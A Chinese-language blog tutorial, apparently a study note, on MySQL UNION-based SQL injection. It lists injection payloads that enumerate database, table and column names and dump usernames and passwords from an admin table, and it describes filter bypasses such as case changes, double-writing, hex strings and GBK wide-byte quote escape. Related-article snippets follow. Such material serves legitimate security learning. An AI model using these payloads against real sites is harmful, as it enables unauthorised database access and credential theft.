SQL注入利用学习-Union联合注入

最新推荐文章于 2024-04-12 02:56:26 发布
最新推荐文章于 2024-04-12 02:56:26 发布
阅读量1.2k 收藏 7
点赞数 27
分类专栏: WEB漏洞—SQL注入 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61861243/article/details/137524819
版权

联合注入的原理

在SQL语句中查询数据时,使用select 相关语句与where 条件子句筛选符合条件的记录。

select * from person where id = 1; #在person表中,筛选出id=1的记录

如果该id=1 中的1 是用户可以控制输入的部分时,就有可能存在SQL注入漏洞。

数据库提供联合查询,使得可以将两条SQL查询语句的结果进行连接。务必注意:两者的字段数必须一致。

select * from person where id = 1 union select 1,2,database(),4,5;

判断联合查询语句中的字段数时,可以使用order by num 。当依次增大num时,如果出现错误,那么上 一条SQL查询语句的结果字段数就为num-1。

联合查询利用SQL注入漏洞语句:

(1)执行联合查询

select * from person where id = 1 union select 1,2,3,4,5;

(2)查询数据库名、版本号、用户信息

select * from person where id = 1 union select 1,2,database(),version(),user();

(3)查询数据表名

select * from person where id = 1 union select 1,2,(select table_name from
information_schema.tables where table_schema=database() limit 0,1),4,5;
或
select * from person where id = 1 union select 1,2,(select group_concat(table_name)
from information_schema.tables where table_schema=database()),4,5;

(4)查询字段名

select * from person where id = 1 union select 1,2,(select group_concat(column_name)
from information_schema.columns where table_name='admin'),4,5;
或
select * from person where id = 1 union select 1,2,(select group_concat(column_name)
from information_schema.columns where table_name=0x61646D696E),4,5;

(5)查询具体数据

select * from person where id = 1 union select 1,concat(username,0x5c,password),3,4,5 from admin; 
或
 select * from person where id = 1 union select 1,concat(username,0x5c,password),3,4,5 from admin limit 0,2;

联合注入不适用情形:

1、union关键字被完全过滤

2、页面中压根不返回查询数据

联合注入过滤绕过技巧:

1、大小写绕过

基础:在Mysql中,大小写字母的含义是一致的。如果在进行过滤提交的数据过程中,没有对大小 进行区分,那么此时就会造成大小写绕过过滤的情况。

以上代码,都只匹配到union,并没有过滤大写字母,因此可以使用 大小写绕过。

2、双写绕过

基础:在使用 preg_replace 函数过程中,默认情况下 只进行一次匹配。因此如果匹配到字符替换 为空的情况 ,就可以造成双写绕过。

以上代码,使用i 表示大小写全部匹配,此时无法使用双写绕过。但是由于preg_replace默认只匹配一次 过滤字符,因此可以使用双写绕过。

3、过滤单引号绕过 十六进制

基础:在Mysql数据库中的SQL语句,对于字符串数据必须使用引号。但是对于字符串来说,Mysql 也识别 字符串中每个字符对应的ASCII码的16进制,此时可以使用 0x16进制替换字符串。从而绕过 引号对字符串的限制。

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是: 单引号(') 双引号(") 反斜杠(\) NULL

该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

在php.ini配置文件中,开启 magic_quotes_gpc 选项,此时对于数字型注入来说,如果需要进行数 据库中数据获取,需要使用十六进制进行绕过。但是对于字符型注入来说,就需要进行逃逸引号的操 作。

4、宽字节注入原理与利用

基础:如果数据库中存储数据使用 的编码方式是 GBK,那么由于用户输入的内容会进行双字节的 组合,会导致用户输入的字节与反斜杠组合,从而逃逸引号。

宽字节注入可以说是一种逃逸引号的技巧,利用双字节组合导致注入产生。

注意有一种情况下无法使用 联合查询注入利用方式:preg_match('/union/i',$sql), 完全过滤。

Krismile☜
关注
  • 27
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全:SQL注入联合注入原理+步骤+实战操作
wangyuxiang946的博客
05-08 765
联合注入原理解析,联合注入使用步骤
sql注入-union select
热门推荐
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入SQL注入的分类 根据SQL数据类型分类 整型注...
SQL注入02】union联合查询注入实例操作
Fighting_hawk的博客
02-18 4053
1. 掌握union联合查询注入的流程; 2. 理解union联合查询的限制条件; 3. 查询语句中尽可能减少字符串的使用,可以转为使用SQL内置函数或转为16进制码。
SQLUnion查询注入
帅醉了的博客
03-03 637
0x00_简介 Union操作符是用于合并两个或者多个select语句的搜索结果集。 在sql注入攻击中,要使union成功执行,必须要满足四个条件: 1、与内部数据库具有相同的字段数。 2、列是相同的数据类型。 3、select语句中的顺序必须相同。 4、当前页面有回显点。 0x01_Union注入一般步骤 order by 判断字段 查看回显数据位置 读库信息 读表信息 读字段 读数据 0...
sql注入——联合注入union select
4pri1
05-22 1644
联合注入 Select * from users where id = 1; mysql> select * from t_unv where unv_id =1 union select 1,2,schema_name from information_schema.schemata; 这里的本来3的位置由schema_name替换,就是第二个图片中查询的所示。 这么写,就通过union select 把本来查询的东西拼接到了3的回显位置上。 mysql> select...
SQL联合查询注入学习
2301_80034711的博客
03-10 1003
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入注入点在URL中②POST注入注入点在POST提交的数据中③Head头注入注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
sql注入union联合注入_sql注入union
最新发布
2401_83739411的博客
04-12 773
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入天书 sqli-labs
01-11
4. **联合查询注入**:利用UNION操作符合并两个或多个查询,以显示非预期的结果。 5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sql注入-0629-田靖宇-17130105521
08-08
SQL注入是一种常见的网络安全漏洞,它发生在应用程序将用户输入的数据直接拼接到SQL查询语句中时。攻击者可以通过构造特殊的输入,使SQL语句执行非预期的操作,从而获取敏感信息、篡改数据甚至控制整个数据库系统。...
详解SQL注入--安全(二)
09-09
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或转义用户输入的SQL语句时。当攻击者向Web表单或URL参数中输入特定的SQL命令片段时,他们可以篡改数据库查询,获取敏感信息,甚至控制整个数据库...
SQL注入-联合查询注入
m0_53820621的博客
08-10 3521
SQL注入-联合查询注入
SQL 注入——联合查询
weixin_51559599的博客
11-06 670
information_schema 元数据库中的 columns 表中存储着数据库中所有的列。information_schema 元数据库中的 tables 表中存储着数据库中所有的表。语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。如果报错,则说明没有该列,继续向小的数字更改查询,直到查询出列数最大值。总共有 517 个表名,因为此前查出在 cms 表中,增加筛选条件。此处因为联合查询,每列的数据类型不同而报错,将。查看 cms_users 表中的字段。连接显示出整列中的内容。
sql注入union联合注入
m0_63436163的博客
01-30 899
联合查询注入联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
关于sql注入(3)union注入
2301_81841047的博客
04-09 997
还是关于我对SQL注入的理解,首先然后就是我对SQL注入现在的理解,与思路。一.判断类型(是否存在sql注入,存在那种sql注入)1.查找注入点:可以通过对其传入的可控参数(常见的有id,password等等)进行简单的构造,通过服务端返回的内容来判断有无注入注入位置有GET数据(大多存在地址栏)、POST数据(大多存在输入框中)、HTTP头部、cookie数据。2.判断是字符型注入还是数字型注入:首先我们假设注入类型为数字型,分别输入如下的语句。如果被测试对象是数字型。
显式Sql注入--Union Select联合注入
qq_17071759的博客
03-19 1281
主要写作用来个人学习总结; 今天复习了一下Union Select注入手法,对联合注入有了新的一些认识; 首先因为某些需求,数据库需要Union函数去实现,具体见链接https://blog.csdn.net/chunqiuwei/article/details/8008625 然后针对Union出现了一些Sql注入攻击手法,以Mysql为例; Mysql特性:数据库所有信息基本都存放在库...
SQL注入学习union联合查询注入
LTNSLALALA的博客
06-13 4303
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL注入 unionselect替换为空绕过
m_de_g的博客
12-13 1462
SQL注入 unionselect替换为空绕过 1.基础知识介绍 1.MySQL中的大小写不敏感,大写与小写一样。用于绕过过滤的黑名单。 2.MySQL中的十六进制与URL编码 3.符号与关键字替换 and----&&、or----|| 4.空格使用%20表示、%0a换行、%09tab键 2.去除(union)的代码分析 preg_replace函数 preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个
sql注入union select 1,2,3
06-28
### 回答1: SQL注入是一种攻击技术,它利用Web应用程序中的漏洞,向数据库注入恶意代码。"union select 1,2,3"是一种常见的SQL注入攻击方式,它的目的是将查询结果合并到现有的查询中,以获取敏感信息或执行恶意操作。为了防止SQL注入攻击,开发人员应该采取一系列措施,如使用参数化查询、过滤输入、限制用户权限等。 ### 回答2: SQL注入是一种恶意攻击方法,攻击者试图通过修改应用程序的输入,来恶意地操作数据库,例如删除数据、修改数据或者获取敏感信息。SQL注入攻击的方式有很多种,其中一种常见的攻击方式是使用Union Select语句。 Union Select语句是一种将两个或多个SELECT语句的结果集合并在一起的方式。攻击者利用Union Select语句,可以将另一个SELECT语句的结果集添加到原始查询结果集中,从而获取更多的敏感数据。例如,攻击者可以使用以下代码: ``` SELECT username, password FROM users WHERE username='' UNION SELECT 1,2,3 FROM users ``` 上述代码中,攻击者通过在Union Select语句中添加“1,2,3”这个结果集,使得查询结果集包含了除了用户名和密码之外的另外三列数据。如果原始查询结果集中包含了敏感数据,这些额外的列可能会暴露更多的敏感信息。 为了防止SQL注入攻击,应用程序开发人员可以采取以下措施: 1.使用参数化查询语句。参数化查询语句不仅可以防止SQL注入攻击,还可以提高查询性能和代码的可读性和可维护性。 2.对输入数据进行验证和过滤。例如,限制用户名只包含字母和数字,防止攻击者使用特殊字符进行注入。 3.记录和监控数据库访问日志。记录日志可以帮助检测和防止SQL注入攻击,以及为后续的安全审计提供依据。 4.使用防火墙和IDS/IPS技术。防火墙和IDS/IPS技术可以检测和阻止具有攻击特征的流量,从而提高系统的安全性。 总之,在应用程序中使用合适的安全策略和技术,可以有效地防止SQL注入攻击。同时,开发者也要认识到,对于数据库的数据查询和处理需要严格甄别,不可以轻易地把所有用户输入和URL参数直接拼接到SQL语句中,应该进行有效的过滤和转义,避免开发过程中出现是否行的安全漏洞,从而确保应用程序和数据库的安全性。 ### 回答3: SQL注入是一种攻击技术,其目的是通过构造恶意输入数据来破坏数据库的完整性和保密性。其中,使用“UNION SELECT”操作符是SQL注入中常见的一种方式。 在SQL注入中,攻击者通过向数据库服务器发送恶意的SQL查询语句,来获取敏感信息或破坏数据库。例如,当攻击者将“UNION SELECT 1,2,3”注入到一个不安全的应用程序中时,他们可能会成功获取数据库中某些表的前三行记录,从而得到有关数据库的敏感信息。 这种攻击方法之所以有效,是因为数据库服务器无法区分合法的查询和恶意的查询。因此,攻击者可以通过注入合适的SQL代码来避开应用程序的安全措施,并从数据库中获取敏感信息。 为了防止SQL注入攻击,开发人员必须采取一系列的安全措施,包括使用参数化查询,严格限制数据输入,过滤掉恶意代码等等。此外,企业也可以使用安全软件和网络安全设备来检测和防止SQL注入攻击。 总之,SQL注入攻击是一种经常被黑客使用的攻击技术,可以通过使用“UNION SELECT”操作符来获取敏感信息或破坏数据库。开发人员必须采取一系列的安全措施,来防止这种攻击方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值